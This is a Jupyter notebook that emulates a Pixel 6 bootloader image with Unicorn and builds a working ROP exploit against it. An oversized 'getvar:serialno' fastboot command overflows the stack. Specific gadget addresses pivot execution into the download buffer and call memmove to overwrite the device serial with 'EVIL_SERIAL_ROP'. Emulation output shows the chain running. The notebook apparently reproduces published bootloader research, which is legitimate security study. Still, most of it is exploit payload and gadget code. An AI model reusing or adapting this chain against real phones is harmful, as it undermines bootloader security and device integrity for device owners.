In [6]:
# Derived from https://github.com/eshard/pixel6-boot/blob/main/run_abl_public.ipynb
# python -m ipykernel install --user --name=pyenv --display-name "Python 3 (pyenv)"
# switch to Python 3 (pyenv) kernel
!echo $VIRTUAL_ENV
!which python
!jupyter kernelspec list



/home/josh/.pyenv/shims/python
Available kernels:
  pyenv      /home/josh/.local/share/jupyter/kernels/pyenv
  python2    /home/josh/.local/share/jupyter/kernels/python2
  python3    /home/josh/.local/share/jupyter/kernels/python3
  venv       /home/josh/.local/share/jupyter/kernels/venv


In [7]:
#%load_ext autoreload
#%autoreload 2

from unicorn import *
from unicorn.arm64_const import *
import unicorn.arm_const
import struct
import capstone
import keystone
import pwn

In [8]:

disassembler = capstone.Cs(capstone.CS_ARCH_ARM64,capstone.CS_MODE_ARM)
def disas(code, addr):
    insn = None
    for insn in disassembler.disasm(code, addr):
        print("0x%x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))
    return insn
    
def gen_shellcode(data,address):
    ks = keystone.Ks(keystone.KS_ARCH_ARM64,keystone.KS_MODE_LITTLE_ENDIAN)
    ret=ks.asm(data,address)
    return bytes(ret[0])

In [9]:

with open("abl_220205","rb") as f:
    data=f.read()

# function addresses abl 22
fastboot_read = 0xFFFF0000F8871E18
download_buffer = 0xffff000090700000 
__debug_stdio_write = 0xFFFF0000F88A7898
fastboot_write = 0xFFFF0000F8871E94
pixel_loader_entry_run = 0xFFFF0000F8813AD4
stop_fastboot = 0xFFFF0000F8ACBD20
fastboot_read_ret = 0xFFFF0000F8871E4C
serial_addr = 0xFFFF0000F8AC0058

# abl 22 - these functions create threads and have side effects so we effectively nop them out
start_app = 0xFFFF0000F88105A0 # abl 22
fastboot_menu_start = 0xFFFF0000F887BE94 # abl22

ABL_LOAD_ADDRESS = 0xFFFF0000F8800000
MEMORY_START = 0xFFFF0000F8000000
MEMORY_SIZE = 200*1024*1024
STACK_START = MEMORY_START + MEMORY_SIZE - 0x1000
last_address = 0

def print_stack(uc,num=10):
    sp = uc.reg_read(UC_ARM64_REG_SP)
    #sp -= (8*2)
    print(f"## STACK DUMP ##\nSP: {sp:x}")
    for i,s in enumerate(range(sp,sp+(num*8),8)):
        if sp != 0:
            v = struct.unpack("Q",uc.mem_read(s,8))[0]
            print(f"@{s:x} {v:x} - #{i*8:x}")
    print(" ")

def print_regs(uc):
    print(" ")
    print(f"## REGISTERS ##")
    for reg in ["X0","X1","X2","X3","X8","X19","X20","X21","X22","X23","X24","X28","X29","X30","SP","PC"]:
        val = eval(f"uc.reg_read(UC_ARM64_REG_{reg})")
        print(f"{reg} - {val:8X}\n",end="")
    print("")

# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size))

    
# ABL220205
#0xffff0000f8818e78: # DIRECT MATCH WITH ABL21
#    ldp x29, x30, [sp], #0x10; 
#    ret;
#
#0xffff0000f8815a84: # DIRECT MATCH WITH ABL21
#    mov sp, x29; 
#    ldp x20, x19, [sp, #0x30]; 
#    ldp x22, x21, [sp, #0x20]; 
#    ldp x24, x23, [sp, #0x10];
#    ldp x29, x30, [sp], #0x40;
#    ret; 
#
#0xffff0000f880c924: # DIRECT MATCH WITH ABL21
#    ldp x20, x19, [sp, #0x30]; 
#    ldp x22, x21, [sp, #0x20];
#    ldp x24, x23, [sp, #0x10];
#    ldp x29, x30, [sp], #0x40; 
#    ret;
#
#0xffff0000f8884684: # DIRECT MATCH WITH ABL21
#    ldr x1, [x23, #0x10];
#    mov x0, x21;
#    mov x2, x20;
#    blr x22; 

#0xFFFF0000F887E2D4 # DIRECT MATCH WITH ABL21
#    ROM:FFFF0000F887E2D4                 BL              memmove ; Branch with Link
#    ROM:FFFF0000F887E2D8                 MOV             W0, WZR ; Rd = Op2
#    ROM:FFFF0000F887E2DC                 LDP             X29, X30, [SP+var_s0],#0x10 ; Load Pair
#    ROM:FFFF0000F887E2E0                 RET                     ; Return from Subroutine
    
# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    global commands
    global last_address
    rop_addresses = [
        #0xFFFF0000F8871E4C, # ret instruction that triggers our overflow
        0xffff0000f8815a84, # first rop gadget
        0xffff0000f8815a84, # stack pivot gadget
        0xffff0000f880c924, # stack pivot gadget (to control registers and call)
        0xffff0000f8884684, # to set x0 etc
        0xFFFF0000F887E2D4, # call memove
    ]
    
    # trace our rop addresses 
    if(address in rop_addresses or address == last_address+4):
        i = disas(uc.mem_read(address,size),address)
        
        if(i.mnemonic == "ret" or i.mnemonic[:2] == "bl"):
            #print("at ret")
            print_regs(uc)
            print_stack(uc)
            
            # did memmove work? Has serial been updated
            serial = mu.mem_read(serial_addr, 16);  
            serial = serial.decode("utf-8")
            print(f"Checking serial: {serial}\n")        
            #commands.append(b"getvar aaa")
            
            #uc.emu_stop()
        last_address = address
    #else:
    #    i = disas(uc.mem_read(address,size),address)
    
def hook_intr(uc, intno, user_data):
    print("\n##### INTERRUPT")
    
    # abl 22 - patch to skip smc
    pc = uc.reg_read(UC_ARM64_REG_PC)
    disas(uc.mem_read(pc,4),pc);
    
    print(f"^ Got interrupt {intno:02x} {pc:02x}. Skipping instruction.\n");
    uc.reg_write(UC_ARM64_REG_PC,pc+4)
    #uc.emu_stop()
    return True

def hook_mem_invalid(uc,uc_mem_type,addr,size,value,user_data):
    print("\n############################################")
    pc = uc.reg_read(UC_ARM64_REG_PC)
    print(f"INVALID MEMORY @{pc:08X} {addr:08x} {size:08x} {value:08x}")
    print_regs(uc)
    print_stack(uc)
    print("############################################\n")
    return False

#Auto allocate pages of memory of size 10Mega on invalid memory access
PAGE_SIZE=10*1024*1024
def hook_mem_invalid_auto(uc,uc_mem_type,addr,size,value,user_data):
    pc = uc.reg_read(UC_ARM64_REG_PC)
    start = addr & ~(PAGE_SIZE-1)
    print(f"~~~~~~~~~~~~~~                      mu.mem_map(0x{start:08x}, PAGE_SIZE)")
    mu.mem_map(start,PAGE_SIZE)
    return True
    
def hook_fastboot_read(uc,address,size,user_data):
    #print("In fb_read")
    dest = mu.reg_read(UC_ARM64_REG_X0)
    size = mu.reg_read(UC_ARM64_REG_X1)
    num_read = mu.reg_read(UC_ARM64_REG_X2)

    global commands
    if len(commands):
        command = commands.pop(0)
    else:
        command = None
        
    if command == b"outofloop" or not command:
        print(">>> Exiting\n")
        #Once we are done, set stop_fastboot to 0 and log instructions
        uc.mem_write(stop_fastboot,struct.pack("Q",1))
        mu.reg_write(UC_ARM64_REG_X0,0xFFFFFFF0)
        uc.reg_write(UC_ARM64_REG_PC,fastboot_read_ret)
    else:
        print(">>> fastboot_read:") # ,hex(dest),hex(size),hex(num_read))
        #print_stack(uc)
        mu.mem_write(num_read,struct.pack("Q",len(command)))
        mu.mem_write(dest,command)
        mu.reg_write(UC_ARM64_REG_X0,0)
        uc.reg_write(UC_ARM64_REG_PC,fastboot_read_ret)
    
def hook_fprintf_output(uc,address,size,user_data):
    data = mu.reg_read(UC_ARM64_REG_X0)
    s = mu.mem_read(data,50)
    size = mu.reg_read(UC_ARM64_REG_X1)
    dunno = mu.reg_read(UC_ARM64_REG_X2)
    d = mu.mem_read(dunno,50)
    print(">>> hook_fprintf_output",hex(data),s,hex(size),hex(dunno),d)
    
def hook_stdio_write(uc,address,size,user_data):
    a = mu.reg_read(UC_ARM64_REG_X0)
    b = mu.reg_read(UC_ARM64_REG_X1)
    c = mu.reg_read(UC_ARM64_REG_X2)
    b = mu.mem_read(b,c)
    try:
        b=b.decode("utf-8")
    except Exception as e:
        b=""
    print(b,end="")
    
def hook_fastboot_write(uc,address,size,user_data):
    a = mu.reg_read(UC_ARM64_REG_X0)
    b = mu.reg_read(UC_ARM64_REG_X1)
    
    try:
        s = mu.mem_read(a,b).decode("utf-8")
    except Exception as e:
        s=""
    print("<<<",s)

# abl 22    
def hook_start_app(uc,address,size,user_data):
    print("\nstart_app hook:")
    pc = uc.reg_read(UC_ARM64_REG_PC)
    disas(uc.mem_read(pc,4),pc);
    #print("\n")

# abl 22    
def hook_fastboot_menu_start(uc,address,size,user_data):
    print("\nfastboot_menu_start hook:")
    pc = uc.reg_read(UC_ARM64_REG_PC)
    disas(uc.mem_read(pc,4),pc);
    print("\n")


In [10]:

# ABL22
commands=[
          b"flashing unlock",
          b"oem dmesg",
          b"getvar:serialno",
          b"getvar:serialnoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
            # Initial return address overwrite
            # Set X29, X30 (next gadget) to stack-based values that we control
            #ROM:FFFF0000F880A988                 LDP             X29, X30, [SP+var_s0],#0x10 ; Load Pair
            #ROM:FFFF0000F880A98C                 RET                     ; Return from Subroutine
            pwn.p64(0xffff0000f8818e78) +
            #pwn.p64(ABL_LOAD_ADDRESS) +
    
            # pivot SP via X29
            #ROM:FFFF0000F881593C                 MOV             SP, X29 ; Rd = Op2
            #ROM:FFFF0000F8815940                 LDP             X20, X19, [SP,#var_s30] ; Load Pair
            #ROM:FFFF0000F8815944                 LDP             X22, X21, [SP,#var_s20] ; Load Pair
            #ROM:FFFF0000F8815948                 LDP             X24, X23, [SP,#var_s10] ; Load Pair
            #ROM:FFFF0000F881594C                 LDP             X29, X30, [SP+var_s0],#0x40 ; Load Pair
            #ROM:FFFF0000F8815950                 RET                     ; Return from Subroutine
            # padding data
            pwn.p64(0xDEADBEEFDEADBEEF) +
            pwn.p64(0xDEADBEEFDEADBEEF) +
            pwn.p64(0xDEADBEEFDEADBEEF) +
            pwn.p64(0xDEADBEEFDEADB11F) +
            pwn.p64(0xDEADBEEFDEADBAEF) +
            pwn.p64(0xDEADBEEFDEADBCCF) +
            # pivot our stack to here
            pwn.p64(download_buffer) +
            # our next payload address (stack pivot)
            pwn.p64(0xffff0000f8815a84),
            
            # ^ set registers (see download_buffer for remaining payload)
            # 0xFFFF0000F880C82C: ldp x20, x19, [sp, #0x30]; ldp x22, x21, [sp, #0x20]; ldp x24, x23, [sp, #0x10]; ldp x29, x30, [sp], #0x40; ret;
            # 0xFFFF0000F8883B48: ldr x1, [x23, #0x10]; mov x0, x21; mov x2, x20; blr x22;
    
            #b"getvar:serialno",
            #b"flashing unlock"
        ]

try:
    # Initialize emulator in ARM mode
    mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)

    # map regions that we need
    mu.mem_map(MEMORY_START, MEMORY_SIZE)
    mu.mem_map(0xd8000000, PAGE_SIZE)
    mu.mem_map(0xf8200000, PAGE_SIZE)
    mu.mem_map(0xffffffff19200000, PAGE_SIZE)
    mu.mem_map(0xfffffffff8200000, PAGE_SIZE)
    mu.mem_map(0xffff000080000000, PAGE_SIZE)
    mu.mem_map(0xffff000002000000, PAGE_SIZE)
    mu.mem_map(0xffffffff10000000, PAGE_SIZE)
    mu.mem_map(0xffffffff17400000, PAGE_SIZE) # abl 2022
    mu.mem_map(0x00000000, PAGE_SIZE) # abl 2022
    mu.mem_map(download_buffer,1024*1024*5) #download buffer
    
    # Init SIMD
    SIMD_INIT=gen_shellcode("mov x1, #(0x3 << 20);msr cpacr_el1, x1;isb;STP Q1, Q2, [SP,#0x10]",download_buffer)
    mu.mem_write(download_buffer, SIMD_INIT)
    mu.emu_start(download_buffer, 0, count=3)        
    
    # Our rop chain post pivoting of the stack
    MEMMOVE_PAYLOAD = (
        (b"D"*8) + 
        #ROM:FFFF0000F880C82C                 LDP             X20, X19, [SP,#0x40+var_10] ; Load Pair
        #ROM:FFFF0000F880C830                 LDP             X22, X21, [SP,#0x40+var_20] ; Load Pair
        #ROM:FFFF0000F880C834                 LDP             X24, X23, [SP,#0x40+var_30] ; Load Pair
        #ROM:FFFF0000F880C838                 LDP             X29, X30, [SP+0x40+var_40],#0x40 ; Load Pair
        #ROM:FFFF0000F880C83C                 RET            
        pwn.p64(0xffff0000f880c924) # ^
        
        # registers set by the above rop chain
        +(b"C"*32)+
        pwn.p64(0xDEADBEEFDEADBA20)+ # N/A not used
        pwn.p64(0xDEADBEEFDEADBE19)+ # x19
        pwn.p64(0xDEADBEEFDEADBE29)+ # x29
        pwn.p64(0xFFFF0000f8884684)+ # x30 (PC)
        pwn.p64(0xDEADBEEFDEADBE24)+ # x24
        pwn.p64(download_buffer+112)+ # x23 (BECOMES X1 (SRC) IN NEXT CHAIN; PTR!) 
        pwn.p64(0xFFFF0000F887E2D4)+ # x22 (BECOMES PC IN NEXT CHAIN!)
        pwn.p64(serial_addr)+        # x21 (BECOMES X0 (DST) IN NEXT CHAIN; RAW)
        pwn.p64(0x10)+               # x20 (BECOMES X2 (SIZE) IN NEXT CHAIN)
        pwn.p64(0xDEADBEEFDEADB119)+ # X19
        # The above is 128 bytes
        # pointer to src string
        pwn.p64(download_buffer+144) + 
        # our final return address post memmove
        pwn.p64(0xFFFF0000F886FB88) + 
        # ^
        #ROM:FFFF0000F8813EBC                 ADRL            X1, loc_FFFF0000F8814638 ; some_callback
        #ROM:FFFF0000F8813EC4                 ADD             X0, SP, #0x50+exit_code ; exit_code
        #ROM:FFFF0000F8813EC8                 BL              fastboot_run ; Branch with Link
        # our new serial (or src data)
        (b"EVIL_SERIAL_ROP") + (b"\x00") 
        
        # above register data processed by the below chains
        #ROM:FFFF0000F8883B48                 LDR             X1, [X23,#0x10] ; Load from Memory
        #ROM:FFFF0000F8883B4C                 MOV             X0, X21 ; Rd = Op2
        #ROM:FFFF0000F8883B50                 MOV             X2, X20 ; Rd = Op2
        #ROM:FFFF0000F8883B54                 BLR             X22     ; Branch and Link Register
        
        #ROM:FFFF0000F887D798                 BL              memmove ; Branch with Link
        #ROM:FFFF0000F887D79C                 MOV             W0, WZR ; Rd = Op2
        #ROM:FFFF0000F887D7A0                 LDP             X29, X30, [SP+var_s0],#0x10 ; Load Pair
        #ROM:FFFF0000F887D7A4                 RET                     ; Return from Subroutine
    )
    
    mu.mem_write(download_buffer, MEMMOVE_PAYLOAD)
    
    #with open("/tmp/download_buffer_abl220205", "wb") as binary_file:
    #   binary_file.write(MEMMOVE_PAYLOAD)
    
    #with open("/tmp/command_buffer_abl220205", "wb") as binary_file:
    #   binary_file.write(commands[0])
    
    # set a serialno (for the sake of emulation)
    mu.mem_write(serial_addr, b"\x44\x41\x41\x41\x41\x41\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x00")    
    
    # write machine code to be emulated to memory
    mu.mem_write(ABL_LOAD_ADDRESS, data)    

    # tracing all basic blocks with customized callback
    #mu.hook_add(UC_HOOK_BLOCK, hook_block)

    # tracing all instruction with customized callback
    mu.hook_add(UC_HOOK_CODE, hook_code) # code tracing
    mu.hook_add(UC_HOOK_INTR, hook_intr) # interrupts
    # auto-map invalid memory access where possible    
    mu.hook_add(UC_HOOK_MEM_INVALID, hook_mem_invalid_auto)
    
    mu.hook_add(UC_HOOK_CODE, hook_fastboot_read, begin=fastboot_read,end=fastboot_read)
    mu.hook_add(UC_HOOK_CODE, hook_stdio_write, begin=__debug_stdio_write,end=__debug_stdio_write)
    mu.hook_add(UC_HOOK_CODE, hook_fastboot_write, begin=fastboot_write,end=fastboot_write)
    
    # abl 22 (we need to nop these out essentially)
    mu.hook_add(UC_HOOK_CODE, hook_start_app, begin=start_app,end=start_app) # abl 22
    mu.hook_add(UC_HOOK_CODE, hook_fastboot_menu_start, begin=fastboot_menu_start,end=fastboot_menu_start)  # abl 22
    
    # abl 22 - make sure start_app() and GUI functions abort (threads etc)
    RET_INST = gen_shellcode("ret",download_buffer)
    mu.mem_write(start_app, RET_INST)
    mu.mem_write(fastboot_menu_start, RET_INST)
    
    # Mark stack as N^X. Will throw an error if we try to execute this region 
    mu.mem_protect(download_buffer, 1024*1024*5, UC_PROT_READ | UC_PROT_WRITE);
    
    # emulate machine code in infinite time
    mu.reg_write(UC_ARM64_REG_SP,STACK_START)
    mu.emu_start(pixel_loader_entry_run, 0,count=100000)
    pc = mu.reg_read(UC_ARM64_REG_PC)    
    print(f">>> PC = 0x{pc:x}")
    
except UcError as e:
    print("ERROR: %s" % e),

partition misc not found
failed to read misc(vendor) partition -2
[   0.000000] [E] [PXL] could not get charger state -27
[   0.000000] [I] [PXL] boot voltage threshold=3400mV

##### INTERRUPT
0xffff0000f880d3e0:	mov	x20, x0
^ Got interrupt 0d ffff0000f880d3e0. Skipping instruction.


start_app hook:
0xffff0000f88105a0:	ret	

fastboot_menu_start hook:
0xffff0000f887be94:	ret	


>>> fastboot_read:
[   0.000000] [I] [FB] Accept cmd:flashing unlock
<<< INFOdevice already unlocked
<<< OKAY
>>> fastboot_read:
[   0.000000] [I] [FB] Accept cmd:oem dmesg
<<< OKAY
>>> fastboot_read:
[   0.000000] [I] [FB] Accept cmd:getvar:serialno
<<< OKAYDAAAAABBBBAAAAAA
>>> fastboot_read:
[   0.000000] [I] [FB] Accept cmd:
<<< FAILvariable (serialnoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>>> Exiting

0xffff0000f8815a84:	mov	sp, x29
0xffff0000f8815a88:	ldp	x20, x19, [sp, #0x30]
0xffff0000f8815a8c:	ldp	x22, x21, [sp, #0x20]
0xffff0000f8815a90:	ldp	x24, x23, [sp, #0x10]
0xffff0000f8815a94:	ldp	x29, x30, [sp